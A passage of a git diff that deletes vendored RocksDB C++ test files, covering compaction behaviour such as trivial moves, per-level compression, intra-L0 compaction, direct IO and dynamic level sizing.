-  sleeping_task_low.WaitUntilDone();
-
-  // Expect compaction to fail here as one file will fail its
-  // creation.
-  ASSERT_TRUE(!dbfull()->TEST_WaitForCompact().ok());
-
-  // Verify L0 -> L1 compaction does fail.
-  ASSERT_EQ(NumTableFilesAtLevel(1), 0);
-
-  // Verify all L0 files are still there.
-  ASSERT_EQ(NumTableFilesAtLevel(0), previous_num_level0_files);
-
-  // All key-values must exist after compaction fails.
-  for (int k = 0; k < kNumInsertedKeys; ++k) {
-    ASSERT_EQ(values[k], Get(keys[k]));
-  }
-
-  env_->non_writable_count_ = 0;
-
-  // Make sure RocksDB will not get into corrupted state.
-  Reopen(options);
-
-  // Verify again after reopen.
-  for (int k = 0; k < kNumInsertedKeys; ++k) {
-    ASSERT_EQ(values[k], Get(keys[k]));
-  }
-}
-
-TEST_P(DBCompactionTestWithParam, DeleteMovedFileAfterCompaction) {
-  // iter 1 -- delete_obsolete_files_period_micros == 0
-  for (int iter = 0; iter < 2; ++iter) {
-    // This test triggers move compaction and verifies that the file is not
-    // deleted when it's part of move compaction
-    Options options = CurrentOptions();
-    options.env = env_;
-    if (iter == 1) {
-      options.delete_obsolete_files_period_micros = 0;
-    }
-    options.create_if_missing = true;
-    options.level0_file_num_compaction_trigger =
-        2;  // trigger compaction when we have 2 files
-    OnFileDeletionListener* listener = new OnFileDeletionListener();
-    options.listeners.emplace_back(listener);
-    options.max_subcompactions = max_subcompactions_;
-    DestroyAndReopen(options);
-
-    Random rnd(301);
-    // Create two 1MB sst files
-    for (int i = 0; i < 2; ++i) {
-      // Create 1MB sst file
-      for (int j = 0; j < 100; ++j) {
-        ASSERT_OK(Put(Key(i * 50 + j), RandomString(&rnd, 10 * 1024)));
-      }
-      ASSERT_OK(Flush());
-    }
-    // this should execute L0->L1
-    dbfull()->TEST_WaitForCompact();
-    ASSERT_EQ("0,1", FilesPerLevel(0));
-
-    // block compactions
-    test::SleepingBackgroundTask sleeping_task;
-    env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                   Env::Priority::LOW);
-
-    options.max_bytes_for_level_base = 1024 * 1024;  // 1 MB
-    Reopen(options);
-    std::unique_ptr<Iterator> iterator(db_->NewIterator(ReadOptions()));
-    ASSERT_EQ("0,1", FilesPerLevel(0));
-    // let compactions go
-    sleeping_task.WakeUp();
-    sleeping_task.WaitUntilDone();
-
-    // this should execute L1->L2 (move)
-    dbfull()->TEST_WaitForCompact();
-
-    ASSERT_EQ("0,0,1", FilesPerLevel(0));
-
-    std::vector<LiveFileMetaData> metadata;
-    db_->GetLiveFilesMetaData(&metadata);
-    ASSERT_EQ(metadata.size(), 1U);
-    auto moved_file_name = metadata[0].name;
-
-    // Create two more 1MB sst files
-    for (int i = 0; i < 2; ++i) {
-      // Create 1MB sst file
-      for (int j = 0; j < 100; ++j) {
-        ASSERT_OK(Put(Key(i * 50 + j + 100), RandomString(&rnd, 10 * 1024)));
-      }
-      ASSERT_OK(Flush());
-    }
-    // this should execute both L0->L1 and L1->L2 (merge with previous file)
-    dbfull()->TEST_WaitForCompact();
-
-    ASSERT_EQ("0,0,2", FilesPerLevel(0));
-
-    // iterator is holding the file
-    ASSERT_OK(env_->FileExists(dbname_ + moved_file_name));
-
-    listener->SetExpectedFileName(dbname_ + moved_file_name);
-    iterator.reset();
-
-    // this file should have been compacted away
-    ASSERT_NOK(env_->FileExists(dbname_ + moved_file_name));
-    listener->VerifyMatchedCount(1);
-  }
-}
-
-TEST_P(DBCompactionTestWithParam, CompressLevelCompaction) {
-  if (!Zlib_Supported()) {
-    return;
-  }
-  Options options = CurrentOptions();
-  options.memtable_factory.reset(
-      new SpecialSkipListFactory(KNumKeysByGenerateNewFile - 1));
-  options.compaction_style = kCompactionStyleLevel;
-  options.write_buffer_size = 110 << 10;  // 110KB
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 2;
-  options.num_levels = 4;
-  options.max_bytes_for_level_base = 400 * 1024;
-  options.max_subcompactions = max_subcompactions_;
-  // First two levels have no compression, so that a trivial move between
-  // them will be allowed. Level 2 has Zlib compression so that a trivial
-  // move to level 3 will not be allowed
-  options.compression_per_level = {kNoCompression, kNoCompression,
-                                   kZlibCompression};
-  int matches = 0, didnt_match = 0, trivial_move = 0, non_trivial = 0;
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "Compaction::InputCompressionMatchesOutput:Matches",
-      [&](void* arg) { matches++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "Compaction::InputCompressionMatchesOutput:DidntMatch",
-      [&](void* arg) { didnt_match++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Reopen(options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // First three 110KB files are going to level 0
-  // After that, (100K, 200K)
-  for (int num = 0; num < 3; num++) {
-    GenerateNewFile(&rnd, &key_idx);
-  }
-
-  // Another 110KB triggers a compaction to 400K file to fill up level 0
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ(4, GetSstFileCount(dbname_));
-
-  // (1, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4", FilesPerLevel(0));
-
-  // (1, 4, 1)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,1", FilesPerLevel(0));
-
-  // (1, 4, 2)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,2", FilesPerLevel(0));
-
-  // (1, 4, 3)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,3", FilesPerLevel(0));
-
-  // (1, 4, 4)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,4", FilesPerLevel(0));
-
-  // (1, 4, 5)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,5", FilesPerLevel(0));
-
-  // (1, 4, 6)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,6", FilesPerLevel(0));
-
-  // (1, 4, 7)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,7", FilesPerLevel(0));
-
-  // (1, 4, 8)
-  GenerateNewFile(&rnd, &key_idx);
-  ASSERT_EQ("1,4,8", FilesPerLevel(0));
-
-  ASSERT_EQ(matches, 12);
-  // Currently, the test relies on the number of calls to
-  // InputCompressionMatchesOutput() per compaction.
-  const int kCallsToInputCompressionMatch = 2;
-  ASSERT_EQ(didnt_match, 8 * kCallsToInputCompressionMatch);
-  ASSERT_EQ(trivial_move, 12);
-  ASSERT_EQ(non_trivial, 8);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Reopen(options);
-
-  for (int i = 0; i < key_idx; i++) {
-    auto v = Get(Key(i));
-    ASSERT_NE(v, "NOT_FOUND");
-    ASSERT_TRUE(v.size() == 1 || v.size() == 990);
-  }
-
-  Destroy(options);
-}
-
-TEST_F(DBCompactionTest, SanitizeCompactionOptionsTest) {
-  Options options = CurrentOptions();
-  options.max_background_compactions = 5;
-  options.soft_pending_compaction_bytes_limit = 0;
-  options.hard_pending_compaction_bytes_limit = 100;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-  ASSERT_EQ(100, db_->GetOptions().soft_pending_compaction_bytes_limit);
-
-  options.max_background_compactions = 3;
-  options.soft_pending_compaction_bytes_limit = 200;
-  options.hard_pending_compaction_bytes_limit = 150;
-  DestroyAndReopen(options);
-  ASSERT_EQ(150, db_->GetOptions().soft_pending_compaction_bytes_limit);
-}
-
-// This tests for a bug that could cause two level0 compactions running
-// concurrently
-// TODO(aekmekji): Make sure that the reason this fails when run with
-// max_subcompactions > 1 is not a correctness issue but just inherent to
-// running parallel L0-L1 compactions
-TEST_F(DBCompactionTest, SuggestCompactRangeNoTwoLevel0Compactions) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleLevel;
-  options.write_buffer_size = 110 << 10;
-  options.arena_block_size = 4 << 10;
-  options.level0_file_num_compaction_trigger = 4;
-  options.num_levels = 4;
-  options.compression = kNoCompression;
-  options.max_bytes_for_level_base = 450 << 10;
-  options.target_file_size_base = 98 << 10;
-  options.max_write_buffer_number = 2;
-  options.max_background_compactions = 2;
-
-  DestroyAndReopen(options);
-
-  // fill up the DB
-  Random rnd(301);
-  for (int num = 0; num < 10; num++) {
-    GenerateNewRandomFile(&rnd);
-  }
-  db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"CompactionJob::Run():Start",
-        "DBCompactionTest::SuggestCompactRangeNoTwoLevel0Compactions:1"},
-       {"DBCompactionTest::SuggestCompactRangeNoTwoLevel0Compactions:2",
-        "CompactionJob::Run():End"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // trigger L0 compaction
-  for (int num = 0; num < options.level0_file_num_compaction_trigger + 1;
-       num++) {
-    GenerateNewRandomFile(&rnd, /* nowait */ true);
-    ASSERT_OK(Flush());
-  }
-
-  TEST_SYNC_POINT(
-      "DBCompactionTest::SuggestCompactRangeNoTwoLevel0Compactions:1");
-
-  GenerateNewRandomFile(&rnd, /* nowait */ true);
-  dbfull()->TEST_WaitForFlushMemTable();
-  ASSERT_OK(experimental::SuggestCompactRange(db_, nullptr, nullptr));
-  for (int num = 0; num < options.level0_file_num_compaction_trigger + 1;
-       num++) {
-    GenerateNewRandomFile(&rnd, /* nowait */ true);
-    ASSERT_OK(Flush());
-  }
-
-  TEST_SYNC_POINT(
-      "DBCompactionTest::SuggestCompactRangeNoTwoLevel0Compactions:2");
-  dbfull()->TEST_WaitForCompact();
-}
-
-
-TEST_P(DBCompactionTestWithParam, ForceBottommostLevelCompaction) {
-  int32_t trivial_move = 0;
-  int32_t non_trivial_move = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:TrivialMove",
-      [&](void* arg) { trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial_move++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Options options = CurrentOptions();
-  options.write_buffer_size = 100000000;
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  int32_t value_size = 10 * 1024;  // 10 KB
-
-  Random rnd(301);
-  std::vector<std::string> values;
-  // File with keys [ 0 => 99 ]
-  for (int i = 0; i < 100; i++) {
-    values.push_back(RandomString(&rnd, value_size));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ("1", FilesPerLevel(0));
-  // Compaction will do L0=>L1 (trivial move) then move L1 files to L3
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 3;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  ASSERT_EQ("0,0,0,1", FilesPerLevel(0));
-  ASSERT_EQ(trivial_move, 1);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  // File with keys [ 100 => 199 ]
-  for (int i = 100; i < 200; i++) {
-    values.push_back(RandomString(&rnd, value_size));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ("1,0,0,1", FilesPerLevel(0));
-  // Compaction will do L0=>L1 L1=>L2 L2=>L3 (3 trivial moves)
-  // then compacte the bottommost level L3=>L3 (non trivial move)
-  compact_options = CompactRangeOptions();
-  compact_options.bottommost_level_compaction =
-      BottommostLevelCompaction::kForce;
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  ASSERT_EQ("0,0,0,1", FilesPerLevel(0));
-  ASSERT_EQ(trivial_move, 4);
-  ASSERT_EQ(non_trivial_move, 1);
-
-  // File with keys [ 200 => 299 ]
-  for (int i = 200; i < 300; i++) {
-    values.push_back(RandomString(&rnd, value_size));
-    ASSERT_OK(Put(Key(i), values[i]));
-  }
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ("1,0,0,1", FilesPerLevel(0));
-  trivial_move = 0;
-  non_trivial_move = 0;
-  compact_options = CompactRangeOptions();
-  compact_options.bottommost_level_compaction =
-      BottommostLevelCompaction::kSkip;
-  // Compaction will do L0=>L1 L1=>L2 L2=>L3 (3 trivial moves)
-  // and will skip bottommost level compaction
-  ASSERT_OK(db_->CompactRange(compact_options, nullptr, nullptr));
-  ASSERT_EQ("0,0,0,2", FilesPerLevel(0));
-  ASSERT_EQ(trivial_move, 3);
-  ASSERT_EQ(non_trivial_move, 0);
-
-  for (int i = 0; i < 300; i++) {
-    ASSERT_EQ(Get(Key(i)), values[i]);
-  }
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBCompactionTestWithParam, IntraL0Compaction) {
-  Options options = CurrentOptions();
-  options.compression = kNoCompression;
-  options.level0_file_num_compaction_trigger = 5;
-  options.max_background_compactions = 2;
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  const size_t kValueSize = 1 << 20;
-  Random rnd(301);
-  std::string value(RandomString(&rnd, kValueSize));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"LevelCompactionPicker::PickCompactionBySize:0",
-        "CompactionJob::Run():Start"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // index:   0   1   2   3   4   5   6   7   8   9
-  // size:  1MB 1MB 1MB 1MB 1MB 2MB 1MB 1MB 1MB 1MB
-  // score:                     1.5 1.3 1.5 2.0 inf
-  //
-  // Files 0-4 will be included in an L0->L1 compaction.
-  //
-  // L0->L0 will be triggered since the sync points guarantee compaction to base
-  // level is still blocked when files 5-9 trigger another compaction.
-  //
-  // Files 6-9 are the longest span of available files for which
-  // work-per-deleted-file decreases (see "score" row above).
-  for (int i = 0; i < 10; ++i) {
-    ASSERT_OK(Put(Key(0), ""));  // prevents trivial move
-    if (i == 5) {
-      ASSERT_OK(Put(Key(i + 1), value + value));
-    } else {
-      ASSERT_OK(Put(Key(i + 1), value));
-    }
-    ASSERT_OK(Flush());
-  }
-  dbfull()->TEST_WaitForCompact();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  std::vector<std::vector<FileMetaData>> level_to_files;
-  dbfull()->TEST_GetFilesMetaData(dbfull()->DefaultColumnFamily(),
-                                  &level_to_files);
-  ASSERT_GE(level_to_files.size(), 2);  // at least L0 and L1
-  // L0 has the 2MB file (not compacted) and 4MB file (output of L0->L0)
-  ASSERT_EQ(2, level_to_files[0].size());
-  ASSERT_GT(level_to_files[1].size(), 0);
-  for (int i = 0; i < 2; ++i) {
-    ASSERT_GE(level_to_files[0][i].fd.file_size, 1 << 21);
-  }
-}
-
-TEST_P(DBCompactionTestWithParam, IntraL0CompactionDoesNotObsoleteDeletions) {
-  // regression test for issue #2722: L0->L0 compaction can resurrect deleted
-  // keys from older L0 files if L1+ files' key-ranges do not include the key.
-  Options options = CurrentOptions();
-  options.compression = kNoCompression;
-  options.level0_file_num_compaction_trigger = 5;
-  options.max_background_compactions = 2;
-  options.max_subcompactions = max_subcompactions_;
-  DestroyAndReopen(options);
-
-  const size_t kValueSize = 1 << 20;
-  Random rnd(301);
-  std::string value(RandomString(&rnd, kValueSize));
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"LevelCompactionPicker::PickCompactionBySize:0",
-        "CompactionJob::Run():Start"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // index:   0   1   2   3   4    5    6   7   8   9
-  // size:  1MB 1MB 1MB 1MB 1MB  1MB  1MB 1MB 1MB 1MB
-  // score:                     1.25 1.33 1.5 2.0 inf
-  //
-  // Files 0-4 will be included in an L0->L1 compaction.
-  //
-  // L0->L0 will be triggered since the sync points guarantee compaction to base
-  // level is still blocked when files 5-9 trigger another compaction. All files
-  // 5-9 are included in the L0->L0 due to work-per-deleted file decreasing.
-  //
-  // Put a key-value in files 0-4. Delete that key in files 5-9. Verify the
-  // L0->L0 preserves the deletion such that the key remains deleted.
-  for (int i = 0; i < 10; ++i) {
-    // key 0 serves both to prevent trivial move and as the key we want to
-    // verify is not resurrected by L0->L0 compaction.
-    if (i < 5) {
-      ASSERT_OK(Put(Key(0), ""));
-    } else {
-      ASSERT_OK(Delete(Key(0)));
-    }
-    ASSERT_OK(Put(Key(i + 1), value));
-    ASSERT_OK(Flush());
-  }
-  dbfull()->TEST_WaitForCompact();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  std::vector<std::vector<FileMetaData>> level_to_files;
-  dbfull()->TEST_GetFilesMetaData(dbfull()->DefaultColumnFamily(),
-                                  &level_to_files);
-  ASSERT_GE(level_to_files.size(), 2);  // at least L0 and L1
-  // L0 has a single output file from L0->L0
-  ASSERT_EQ(1, level_to_files[0].size());
-  ASSERT_GT(level_to_files[1].size(), 0);
-  ASSERT_GE(level_to_files[0][0].fd.file_size, 1 << 22);
-
-  ReadOptions roptions;
-  std::string result;
-  ASSERT_TRUE(db_->Get(roptions, Key(0), &result).IsNotFound());
-}
-
-TEST_F(DBCompactionTest, OptimizedDeletionObsoleting) {
-  // Deletions can be dropped when compacted to non-last level if they fall
-  // outside the lower-level files' key-ranges.
-  const int kNumL0Files = 4;
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = kNumL0Files;
-  options.statistics = rocksdb::CreateDBStatistics();
-  DestroyAndReopen(options);
-
-  // put key 1 and 3 in separate L1, L2 files.
-  // So key 0, 2, and 4+ fall outside these levels' key-ranges.
-  for (int level = 2; level >= 1; --level) {
-    for (int i = 0; i < 2; ++i) {
-      Put(Key(2 * i + 1), "val");
-      Flush();
-    }
-    MoveFilesToLevel(level);
-    ASSERT_EQ(2, NumTableFilesAtLevel(level));
-  }
-
-  // Delete keys in range [1, 4]. These L0 files will be compacted with L1:
-  // - Tombstones for keys 2 and 4 can be dropped early.
-  // - Tombstones for keys 1 and 3 must be kept due to L2 files' key-ranges.
-  for (int i = 0; i < kNumL0Files; ++i) {
-    Put(Key(0), "val");  // sentinel to prevent trivial move
-    Delete(Key(i + 1));
-    Flush();
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  for (int i = 0; i < kNumL0Files; ++i) {
-    std::string value;
-    ASSERT_TRUE(db_->Get(ReadOptions(), Key(i + 1), &value).IsNotFound());
-  }
-  ASSERT_EQ(2, options.statistics->getTickerCount(
-                   COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE));
-  ASSERT_EQ(2,
-            options.statistics->getTickerCount(COMPACTION_KEY_DROP_OBSOLETE));
-}
-
-INSTANTIATE_TEST_CASE_P(DBCompactionTestWithParam, DBCompactionTestWithParam,
-                        ::testing::Values(std::make_tuple(1, true),
-                                          std::make_tuple(1, false),
-                                          std::make_tuple(4, true),
-                                          std::make_tuple(4, false)));
-
-TEST_P(DBCompactionDirectIOTest, DirectIO) {
-  Options options = CurrentOptions();
-  Destroy(options);
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.use_direct_io_for_flush_and_compaction = GetParam();
-  options.env = new MockEnv(Env::Default());
-  Reopen(options);
-  bool readahead = false;
-  SyncPoint::GetInstance()->SetCallBack(
-      "TableCache::NewIterator:for_compaction", [&](void* arg) {
-        bool* use_direct_reads = static_cast<bool*>(arg);
-        ASSERT_EQ(*use_direct_reads,
-                  options.use_direct_io_for_flush_and_compaction);
-      });
-  SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::OpenCompactionOutputFile", [&](void* arg) {
-        bool* use_direct_writes = static_cast<bool*>(arg);
-        ASSERT_EQ(*use_direct_writes,
-                  options.use_direct_io_for_flush_and_compaction);
-      });
-  if (options.use_direct_io_for_flush_and_compaction) {
-    SyncPoint::GetInstance()->SetCallBack(
-        "SanitizeOptions:direct_io", [&](void* arg) {
-          readahead = true;
-        });
-  }
-  SyncPoint::GetInstance()->EnableProcessing();
-  CreateAndReopenWithCF({"pikachu"}, options);
-  MakeTables(3, "p", "q", 1);
-  ASSERT_EQ("1,1,1", FilesPerLevel(1));
-  Compact(1, "p1", "p9");
-  ASSERT_FALSE(readahead ^ options.use_direct_io_for_flush_and_compaction);
-  ASSERT_EQ("0,0,1", FilesPerLevel(1));
-  Destroy(options);
-  delete options.env;
-}
-
-INSTANTIATE_TEST_CASE_P(DBCompactionDirectIOTest, DBCompactionDirectIOTest,
-                        testing::Bool());
-
-class CompactionPriTest : public DBTestBase,
-                          public testing::WithParamInterface<uint32_t> {
- public:
-  CompactionPriTest() : DBTestBase("/compaction_pri_test") {
-    compaction_pri_ = GetParam();
-  }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  uint32_t compaction_pri_;
-};
-
-TEST_P(CompactionPriTest, Test) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 16 * 1024;
-  options.compaction_pri = static_cast<CompactionPri>(compaction_pri_);
-  options.hard_pending_compaction_bytes_limit = 256 * 1024;
-  options.max_bytes_for_level_base = 64 * 1024;
-  options.max_bytes_for_level_multiplier = 4;
-  options.compression = kNoCompression;
-
-  DestroyAndReopen(options);
-
-  Random rnd(301);
-  const int kNKeys = 5000;
-  int keys[kNKeys];
-  for (int i = 0; i < kNKeys; i++) {
-    keys[i] = i;
-  }
-  std::random_shuffle(std::begin(keys), std::end(keys));
-
-  for (int i = 0; i < kNKeys; i++) {
-    ASSERT_OK(Put(Key(keys[i]), RandomString(&rnd, 102)));
-  }
-
-  dbfull()->TEST_WaitForCompact();
-  for (int i = 0; i < kNKeys; i++) {
-    ASSERT_NE("NOT_FOUND", Get(Key(i)));
-  }
-}
-
-INSTANTIATE_TEST_CASE_P(
-    CompactionPriTest, CompactionPriTest,
-    ::testing::Values(CompactionPri::kByCompensatedSize,
-                      CompactionPri::kOldestLargestSeqFirst,
-                      CompactionPri::kOldestSmallestSeqFirst,
-                      CompactionPri::kMinOverlappingRatio));
-
-#endif // !defined(ROCKSDB_LITE)
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-#if !defined(ROCKSDB_LITE)
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif
-}
diff --git a/thirdparty/rocksdb/db/db_dynamic_level_test.cc b/thirdparty/rocksdb/db/db_dynamic_level_test.cc
deleted file mode 100644
index f968e7f..0000000
--- a/thirdparty/rocksdb/db/db_dynamic_level_test.cc
+++ /dev/null
@@ -1,506 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// Introduction of SyncPoint effectively disabled building and running this test
-// in Release build.
-// which is a pity, it is a good test
-#if !defined(ROCKSDB_LITE)
-
-#include "db/db_test_util.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-
-namespace rocksdb {
-class DBTestDynamicLevel : public DBTestBase {
- public:
-  DBTestDynamicLevel() : DBTestBase("/db_dynamic_level_test") {}
-};
-
-TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBase) {
-  if (!Snappy_Supported() || !LZ4_Supported()) {
-    return;
-  }
-  // Use InMemoryEnv, or it would be too slow.
-  unique_ptr<Env> env(new MockEnv(env_));
-
-  const int kNKeys = 1000;
-  int keys[kNKeys];
-
-  auto verify_func = [&]() {
-    for (int i = 0; i < kNKeys; i++) {
-      ASSERT_NE("NOT_FOUND", Get(Key(i)));
-      ASSERT_NE("NOT_FOUND", Get(Key(kNKeys * 2 + i)));
-      if (i < kNKeys / 10) {
-        ASSERT_EQ("NOT_FOUND", Get(Key(kNKeys + keys[i])));
-      } else {
-        ASSERT_NE("NOT_FOUND", Get(Key(kNKeys + keys[i])));
-      }
-    }
-  };
-
-  Random rnd(301);
-  for (int ordered_insert = 0; ordered_insert <= 1; ordered_insert++) {
-    for (int i = 0; i < kNKeys; i++) {
-      keys[i] = i;
-    }
-    if (ordered_insert == 0) {
-      std::random_shuffle(std::begin(keys), std::end(keys));
-    }
-    for (int max_background_compactions = 1; max_background_compactions < 4;
-         max_background_compactions += 2) {
-      Options options;
-      options.env = env.get();
-      options.create_if_missing = true;
-      options.write_buffer_size = 2048;
-      options.max_write_buffer_number = 2;
-      options.level0_file_num_compaction_trigger = 2;
-      options.level0_slowdown_writes_trigger = 2;
-      options.level0_stop_writes_trigger = 2;
-      options.target_file_size_base = 2048;
-      options.level_compaction_dynamic_level_bytes = true;
-      options.max_bytes_for_level_base = 10240;
-      options.max_bytes_for_level_multiplier = 4;
-      options.soft_rate_limit = 1.1;
-      options.max_background_compactions = max_background_compactions;
-      options.num_levels = 5;
-
-      options.compression_per_level.resize(3);
-      options.compression_per_level[0] = kNoCompression;
-      options.compression_per_level[1] = kLZ4Compression;
-      options.compression_per_level[2] = kSnappyCompression;
-      options.env = env_;
-
-      DestroyAndReopen(options);
-
-      for (int i = 0; i < kNKeys; i++) {
-        int key = keys[i];
-        ASSERT_OK(Put(Key(kNKeys + key), RandomString(&rnd, 102)));
-        ASSERT_OK(Put(Key(key), RandomString(&rnd, 102)));
-        ASSERT_OK(Put(Key(kNKeys * 2 + key), RandomString(&rnd, 102)));
-        ASSERT_OK(Delete(Key(kNKeys + keys[i / 10])));
-        env_->SleepForMicroseconds(5000);
-      }
-
-      uint64_t int_prop;
-      ASSERT_TRUE(db_->GetIntProperty("rocksdb.background-errors", &int_prop));
-      ASSERT_EQ(0U, int_prop);
-
-      // Verify DB
-      for (int j = 0; j < 2; j++) {
-        verify_func();
-        if (j == 0) {
-          Reopen(options);
-        }
-      }
-
-      // Test compact range works
-      dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-      // All data should be in the last level.
-      ColumnFamilyMetaData cf_meta;
-      db_->GetColumnFamilyMetaData(&cf_meta);
-      ASSERT_EQ(5U, cf_meta.levels.size());
-      for (int i = 0; i < 4; i++) {
-        ASSERT_EQ(0U, cf_meta.levels[i].files.size());
-      }
-      ASSERT_GT(cf_meta.levels[4U].files.size(), 0U);
-      verify_func();
-
-      Close();
-    }
-  }
-
-  env_->SetBackgroundThreads(1, Env::LOW);
-  env_->SetBackgroundThreads(1, Env::HIGH);
-}
-
-// Test specific cases in dynamic max bytes
-TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBase2) {
-  Random rnd(301);
-  int kMaxKey = 1000000;
-
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.write_buffer_size = 20480;
-  options.max_write_buffer_number = 2;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 9999;
-  options.level0_stop_writes_trigger = 9999;
-  options.target_file_size_base = 9102;
-  options.level_compaction_dynamic_level_bytes = true;
-  options.max_bytes_for_level_base = 40960;
-  options.max_bytes_for_level_multiplier = 4;
-  options.max_background_compactions = 2;
-  options.num_levels = 5;
-  options.max_compaction_bytes = 0;  // Force not expanding in compactions
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  DestroyAndReopen(options);
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "true"},
-  }));
-
-  uint64_t int_prop;
-  std::string str_prop;
-
-  // Initial base level is the last level
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(4U, int_prop);
-
-  // Put about 28K to L0
-  for (int i = 0; i < 70; i++) {
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 380)));
-  }
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "false"},
-  }));
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(4U, int_prop);
-
-  // Insert extra about 28K to L0. After they are compacted to L4, base level
-  // should be changed to L3.
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "true"},
-  }));
-  for (int i = 0; i < 70; i++) {
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 380)));
-  }
-
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "false"},
-  }));
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(3U, int_prop);
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level1", &str_prop));
-  ASSERT_EQ("0", str_prop);
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level2", &str_prop));
-  ASSERT_EQ("0", str_prop);
-
-  // Trigger parallel compaction, and the first one would change the base
-  // level.
-  // Hold compaction jobs to make sure
